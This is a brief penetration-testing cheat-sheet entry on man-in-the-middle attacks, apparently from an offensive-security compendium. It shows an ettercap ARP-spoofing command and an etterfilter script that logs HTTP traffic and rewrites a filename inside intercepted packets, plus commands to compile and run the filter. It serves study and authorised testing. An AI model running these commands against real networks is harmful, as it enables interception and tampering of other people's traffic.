killchain-compendium/Post Exploitation/Man in the Middle.md

Man In the Middle

• Ettercap

• Bettercap

• ARP spoofing via ettercap and read traffic. Press q to reverse to pre mitm arp caches

ettercap -T -i <interface> -M arp

• Etterfilter can filter and restructure packets

man etterfilter

if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html") ) {
    log(DATA.data, "/tmp/ettercap.log");
    replace("filename.html", "otherfilename.html" );
    msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");
}

• Escape double quote inside the payload string
• compile via

etterfilter filter.ef -o filter.ef

• Run the filter via

ettercap -T -i <interface> -M arp -F filter.ef